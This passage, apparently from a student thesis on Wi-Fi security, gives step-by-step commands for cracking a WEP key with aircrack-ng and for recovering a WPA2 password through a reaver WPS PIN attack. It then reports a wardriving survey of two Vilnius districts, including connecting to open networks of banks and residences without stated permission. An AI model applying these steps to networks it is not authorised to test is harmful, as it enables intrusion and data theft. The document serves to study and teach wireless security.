the menu called Places and the in the Home folder menu. Before us we have something
like this:
47. 47
Picture 32: home folder and files created
The WEP-01.cap file is the file we created with the -w parameter. In this file we have
the WEP key. But it is still encrypted. We have to decrypt it.
To decrypt the WEP key, we have to open a new terminal in the same folder the .cap file
is and execute the next command: aircrack-ng FILE_NAME.cap
Keep in mind that this command is case sensitive.
Et voila, before us we will show the following:
Picture 33: the decryption worked
48. 48
Picture 34: the WEP key is in our control
And there it is, we already have the key. We only need to remove the brackets and the
two key points. That is the key. Now we only need to connect to the router using the
password we already have and surf on the Internet.
We closed all terminals and the process is complete.
49. 49
3.3 ATTACK ON WPA & WPA2 TECHNOLOGY THROUGH WPS
An example of this kind of attack on WPS technology is following:
Picture 35: airmon-ng command
Picture 36: starting the network card as monitor
50. 50
Pictures 37 & 38: monitoring the Wi-Fi networks
The previous images belong to the beginning process. Now, the new part of the attack
begins.
The next command to execute is: wash -i wlan0mon --ignore-fcs The wash tool helps us
to discover if the Wi-Fi networks within our reach have WPS activated or not.
The parameter –i wlan0mon specifies our network card and the parameter --ignore-fcs
is for ignoring the possible checksum errors. Those errors may interfere in the proper
running of the tool.
Once the wash tool has been executed, a list of all the Wi-Fi networks will be displayed
on our screen. We will be able to see the BSSID, MAC address, of the router, the channel
the networks are broadcasting, the WPS version and if the WPS is blocked or not. Also
the SSID of the network.
51. 51
Picture 39: checking if WPS is enabled or disabled
If the network we are targeting has the WPS enabled, now it is time to start the attack.
We press Control+C and execute a new command:
reaver -i wlan0mon -b ACCESS_POINT_MAC –v
being –i wlan0mon the parameter that specifies our network card, -b specifies the
BSSID, the MAC address of the access point and the parameter –v specifying the level
of detail we want to see on the screen. For more information, instead of –v we shall
write –vv.
Picture 40: attacking the WPS pin
52. 52
Now it is time for waiting. If our attack succeeded, we will know the WPS pin and the
WPA2 password. If not, we will have to wait, because the access point will reject us
over and over again.
Picture 41: WPS pin & WPA password are now visible
As we can see in the previous image, our attack was successful and now we know the
WPS pin and the WPA password. We have now full access to the Internet through this
Wi-Fi network.
We have seen how easy it is to break WPA or WPA2 security by exploiting the WPS
feature. That is why is recommended to turn off WPS.
3.4 CONCLUSION ON PRACTICAL WI-FI ATTACKS
Two attacks have been done: one against WEP technology and the other one against
WPA2 technology through WPS weakness. This second attack may also work on WPA
technology, since it also incorporates WPS.
Both conclusions will be given separately.
The attack against WEP technology highlighted what it was written on the theoretical part
of that encryption system: it is an old and useless security measure that can be broken
within minutes. Nowadays, WEP encryption is almost the same as not having any
encryption measure.
53. 53
The attack against WPA2 required a different approach. WPA2 has emerged as the best
encryption system that can be found nowadays. Nevertheless, it is not infallible.
Some weakness points came to the light recently and the fact that it includes WPS
technology makes it easier to break. The attack carried out only took some minutes before
obtaining WPS pin and the network password. A WPS pin may be easier to remember for
the user, but it is also to break than the password. In order to keep our network secure, it
is recommendable to turn off WPS technology.
4. WARDRIVING IN THE CITY OF VILNIUS
4.1 TECHNOLOGY USED
A wardriving of the city of Vilnius, the capital of the Republic of Lithuania, will be
performed as the practical part of this thesis work,
It has been explained already what a wardriving is. Therefore, the way this wardriving
was done and the technology used will be explained.
For this project a mobile phone, with an Internet connection and GPS, was used. The free
application "WigleWifi" was installed on the mobile phone and was used to perform the
wardriving. The application can be found at the Google Play store. The application of
Google called "Google Earth" was installed on a computer under Windows 10 as its
Operative System.
The mobile phone used was a Motorola Moto G from 2013. Two computers were used to
perform the wardriving. The main one was a Toshiba Satellite L750 from 2011. Even
when this laptop has an Intel i5 as its CPU and 6 gigabytes of RAM, when the KML file
which contains all the data collected, the laptop struggles to show all the information.
Performing a wardriving is a very simple task. All that was needed to do was to start the
application on the mobile phone with the GPS being turned on. The user does not need to
do anything, since the application detects all the networks on its own. The application
tracks all wireless signals within reach and, thanks to the use of GPS, it is able to keep
them in position (using GPS coordinates we will be able to see these wireless networks
on a map with a tiny error).
The application is very intuitive and user friendly. IT knowledge is not required in order
to use the application
54. 54
Picture 42: WigleWifi screen while being used
Some aspects of the "WigleWifi" application will be explained next.
In the picture above it is possible to see how the screen of the application looks like after
using the application a couple of minutes.
First, the number of wireless networks detected at that moment, how many of them have
been detected for the first time and how many have been detected before and, therefore,
those that are already stored in the database of the application.
The next section is the user's position: the GPS coordinates. The application knows it
because of the GPS incorporated in the mobile phone. The application also indicates that
there is a margin of error of, more or less, six meters. This margin changes, being smaller
if the user is at open sky and bigger if the user is in inside some building or in an hidden
area, like in the forrest. It also tells us the number of satellites we are connected to. The
55. 55
more satellites we are connected, the better. In the case of the image at that time the user
was connected to 12 satellites. If the user is moving (car, walking...), the application also
informs us of our speed.
Labeled with the number three we can see the number of wireless networks detected at a
specific distance. In the particular case of the photo above, within a radius of about 500
meters, the network was able to detect about 20 wireless networks.
Then all wireless networks detected in the current session appear. The application shows
to us a lot of information on such networks as, for example, the SSID, on what time they
were detected, the channel on which those wireless networks transmits and the security
type of the wireless network (WEP, WPA ...) among many other things.
If we click on one of them, the application will open a new window that will show
information from that particular wireless network:
Picture 43: the window the application opens when we click on a specific Wi-Fi network.
The application also allows us to see the wireless networks on a map. Depending on the
zoom level, it will show the wireless networks in bubbles. Two images come next, in
order to proof this fact.
57. 57
If the zoom is close to the ground (or if the number of wireless networks is small), the
SSID of the networks will appear on the screen. If the zoom is high, or if the number of
wireless networks is high, the application will group them into bubbles to have a "cleaner"
screen. The SSID of the networks will appear again as the user is approaching to the
ground: the bubbles will separate into smaller bubbles up to a zoom level such that the
SSID will be again readable.
Once a certain amount of data has been captured, it is time to send it into a KML file.
Once the KML file has been created, by just clicking on it the wardriving will appear on
the screen. It will do so by executing Google Earth, which was installed before.
In order to send all the information recollected by “WigleWifi” into a KML file, all that
is necessary to do is to open the side menu, located on the left of the screen and choose
the option labeled as "Data". Several options appear, being "Export to KML" the one that
will create the KML file. After a few seconds, a message will be displayed on the screen,
showing the whereabouts of the KML file.
Picture 46: Google Earth shows us an early wardriving of Vilnius
As it can be seen in the previous image, once executed the KML file, it opens a map with
all the wireless networks that have been detected during the wardriving. It is normal if it
takes a while to display all the information. The amount of information to display is huge.
58. 58
Picture 47: Wi-Fi networks detected in the city center of Vilnius
By clicking in one of them, a small window with information about the selected
wireless network will be displayed, like in the mobile application:
Picture 48: example of the tiny information window displayed
59. 59
Picture 49: same image as before, where we can see the information displayed
Also, on the left side of the screen, a list of all the wireless networks that have been
detected in the course of wardriving is displayed.
The name of the wireless network, the BSSID and the capabilities of those wireless
networks are shown.
This can be appreciated in the next image:
Picture 50: once the KML file has been executed, the user might see something like this
60. 60
Picture 51: all the wireless networks are listed on the left side of the screen
As it has been said before, on the list several characteristics of the wireless networks are
shown. In blue and underlined, the SSID of each one of the wireless networks. In the
immediate bottom, the BSSID of the wireless network.
The BSSID (Basic Service Set Identifier for its acronym in English) of a wireless network
or WLAN local area, is a unique identification name of all the packages of a wireless
network, in order to identify them as part of that network.
Unlike the SSID, which can be used in multiple BSS, the BSSID can only be used in one.
It is formed with the MAC address, that consists of 48 bits (6 hex blocks), of the wireless
access point (WAP stands for Wireless Access Point English) it is connected to.
Finally, next to the label Capabilities, we can see the type of security of the network (WEP,
WPA, WPA2...).
61. 61
In the picture immediately below we can see everything commented:
Picture 52: example of the information displayed of one wireless network
It is possible to deselect some wireless networks. The deselected networks will not appear
on Google Earth. Sometimes, this is very useful: for example, if only WPA2 need to be
displayed.
An example in the university area is following. At first, only those wireless networks with
ESS security measure will be displayed:
It can be seen that are just those belonging to the university. If all of them are selected,
the image changes, since all the networks detected appear in the map:
Pictures 53 & 54: wireless networks detected at VGTU complex
62. 62
As mentioned before, the appearance of more wireless networks is obvious. It highlights
the wireless network called eduroam, which is an international wireless network for
students and that can be found, not only in different places of the city of Vilnius, but in
every single European city with a university.
4.2 PRACTICAL WARDRIVING
Within the wardriving, a study and a comparison of two different districts of the city of
Vilnius, will be done. In this particular case, the districts to be compared are the Šeškinė
neighborhood, located about six kilometers from the city center of Vilnius and the
Šnipiškės district, home of the financial district of Vilnius.
These two neighborhoods have been chosen to be two opposing neighborhoods: while the
first is a bedroom suburb of the city of Vilnius, it is in the second one where most of the
companies, banks and the town hall itself are located in the city.
It will be interesting to see where there are more wireless networks, in which one security
is better and in which neighborhood or district it will be easier to get access to the Internet.
4.2.1 WARDRIVING IN THE DISTRICT OF ŠNIPIŠKĖS
Picture 55: Vilnius business district
Šnipiškės district, and more particularly the area known as "Vilnius business triangle"
welcomes many companies, whether domestic or international, as well as various organs
of the city of Vilnius.
63. 63
The first wardriving of this area of the city took place at the end of March 2016, being
the second one done in May 2016. Doing this wardriving was very simple and the data
was collected by the free application "Wigle".
In about one hour, the application detected, more or less, 150 wireless networks in a
relatively small area.
It must be mentioned here too, although it has been already mentioned above, that the
realization of this wardriving has been carried out with basic equipment, so it is likely
that sometimes wireless networks may appear in places that do not correspond to reality.
These irregularities will be, obviously, ignored.
Picture 56: Wardriving in Vilnius business district
The first surprising fact was the large number of access points found without any security.
These access points belonged overwhelmingly to companies settled there (banks,
restaurants, hotels and the city hall...)
To get access to the Internet through five of them was tried. In two of them the connection
to the Internet worked without any inconvenient, being the connection completely
operational. In the other three I was some identification was asked by the network in order
to allow a connection. Interestingly, those in which the connection worked without any
problems were those that belonged to bank offices (Swedbank and DNB). Wireless
networks belonging to hotels were asking for some form of identification.
64. 64
Picture 57: OPEN networks in Vilnius business district
Even when it is true that most of the wireless networks detected had WPA or WPA2 as its
protection system, making them very difficult to break, it is not a surprise the presence of
wireless networks with WEP technology, although true must be said, they are minority,
as shown in the following picture:
Picture 58: WEP networks in Vilnius business district
As with the WPA technology, WEP technology has been explained already in this thesis
work. At the time of writing, WEP technology can be broken in just a few minutes with
an average computer.
While it is not surprising the presence of wireless networks protected by this technology,
since it was very popular, nowadays WEP is a highly vulnerable technology. Their
presence, though minority, in such an important area could be used for data theft or other
activities.
65. 65
And finally, the presence of networks with WPA or WPA2 technology has been relieved
as the majority. Something not surprising.
Picture 59: WPA and WPA2 networks in Vilnius business district
Nowadays, WPA2 technology is the best choice when protecting a wireless network.
Although not invulnerable to certain attacks, such attacks require a long time, processing
power and sometimes some level of access to the network itself.
Within the latter networks, the presence of WPA2 is significantly higher than the WPA,
being safer the first one.
4.2.2 WARDRIVING IN THE DISTRICT OF ŠEŠKINĖ
We have already commented before that the district of Šeškinė is a purely residential area,
as well could be considered the neighborhood of the Chantria in the city of Leon. It is a
neighborhood of recently built, with multi-storey buildings and few businesses or shops.
It is a purely Soviet neighborhood.
Picture 60: district of Šeškinė
66. 66
Since it is a residential neighborhood some differences were expected, such as finding
very few OPEN wireless networks, although the number of networks with WEP
technology would be considerably higher than the one found in the business district.
Picture 61: Wardriving in the district of Šeškinė
The first thing to observe in the map is the large number of detected networks (about two
hundred), bigger than the number of networks detected in the business district. Also the
majority presence of WPA and/or WPA2 over WEP.
Also surprising is the absence of wireless networks over a wide area, as we can see in the
picture below:
Picture 62: weird lack of wireless networks in the district of Šeškinė
67. 67
Few networks without any protection were expected to be found, and so it happened.
Overall, around twenty OPEN networks were found, though not through all of them the
connection to the Internet was possible.
Out of those twenty OPEN networks, three belonged to printers with built-in Wi-Fi
technology. Another belonged to a kiosk (Lietuvos SPAUDA WiFi). While it is possible
to connect to the kiosk's network, it immediately asks for a username and a password.
Without those identification login, the access to the Internet through this network was not
possible.
Five different OPEN networks were tested, succeeding to connect to the Internet in four
of them. The fifth one never assigned an IP address, the access to the Internet through it
was not possible.
Picture 63: OPEN networks in the district of Šeškinė
As it can be seen in the picture above, the number of wireless networks without any kind
of protection is less than the one found at the business district of Vilnius. It makes sense
though, because while in the business district plenty of restaurants, hotels and other places
that offer their customers a free Internet connection can be found, in the bedroom district
there is hardly such kind of establishments.
The number of networks with WEP protection in the neighborhood of Šeškinė is not high,
having detected only a dozen of them with this kind of protection.
68. 68
Picture 64: WEP networks in the district of Šeškinė
Finally, networks protected with WPA or WPA2 technology. The number of networks
with this type of security is overwhelming, being vastly superior to the number of wireless
networks with the same kind of protection in the business district.
It makes sense, though, since statistically in every house at least one wireless access point
can be found and WPA and WPA2 are, at the time of writing, the safety standard of
wireless technology.
Picture 65: WPA and WPA2 networks in the district of Šeškinė
69. 69
While in the business district of Vilnius more OPEN networks were detected, it was in
the Šeškinė district where more networks protected by WEP technology were found.
While I cannot guarantee that those networks belong to individuals, the low presence of
restaurants and shops indicated so.
4.2.3 COMPARISON OF BOTH WARDRIVING
Both Wardriving have been carried out and the differences are obvious. Some graphics
are included to demonstrate this statement. The first graphic corresponds to the business
district of Vilnius and the second one to the bedroom district.
Picture 66: graphic networks at Šnipiškės district
70. 70
Picture 67: graphic networks at Šeškinė district
At first sight, both graphics look similar:
1. Huge majority of the networks have WPA or WPA2 as its encryption system.
2. The networks with WEP as its encryption system are the less.
3. OPEN Networks are a reality.
But some appreciations are required in order to understand the differences between these
two districts.
As it can be seen in the graphics before attached, the number of OPEN Networks is the
same in both districts. But this coincidence is fake. While in the business district most of
the OPEN Networks belong to restaurants or hotels, in the bedroom district most of the
OPEN Networks turned out to be printers Wi-Fi or kiosk Wi-Fi. It was impossible to get
access to the Internet through the last ones.
The percentages are as follow:
In the business district, WPA & WPA2 networks are 85% of the networks detected. WEP
encryption system is present in the 5% of the networks detected and, therefore, 10% of
the networks are OPEN Networks.
On the other hand, in the bedroom dormitory WPA & WPA2 is present in 84’66% of the
networks. The difference is minuscule. WEP encryption can be still found in the 2% of
the networks. OPEN Networks are 13’33% of the networks detected.
71. 71
The previous images may look the same, but if we look at a pie chart of both wardrivings,
the differences can be easily seen:
Pictures 68 and 69: pie charts of the networks detected.
The main difference lays in the percent of OPEN Networks. The absolute number is the
same, but it has been proved that in the bedroom district the percentage of OPEN
Networks is two times bigger.
On the other hand, the number of WEP networks is three times smaller at the business
district, but the percentage is smaller. It makes sense since. As it has been discussed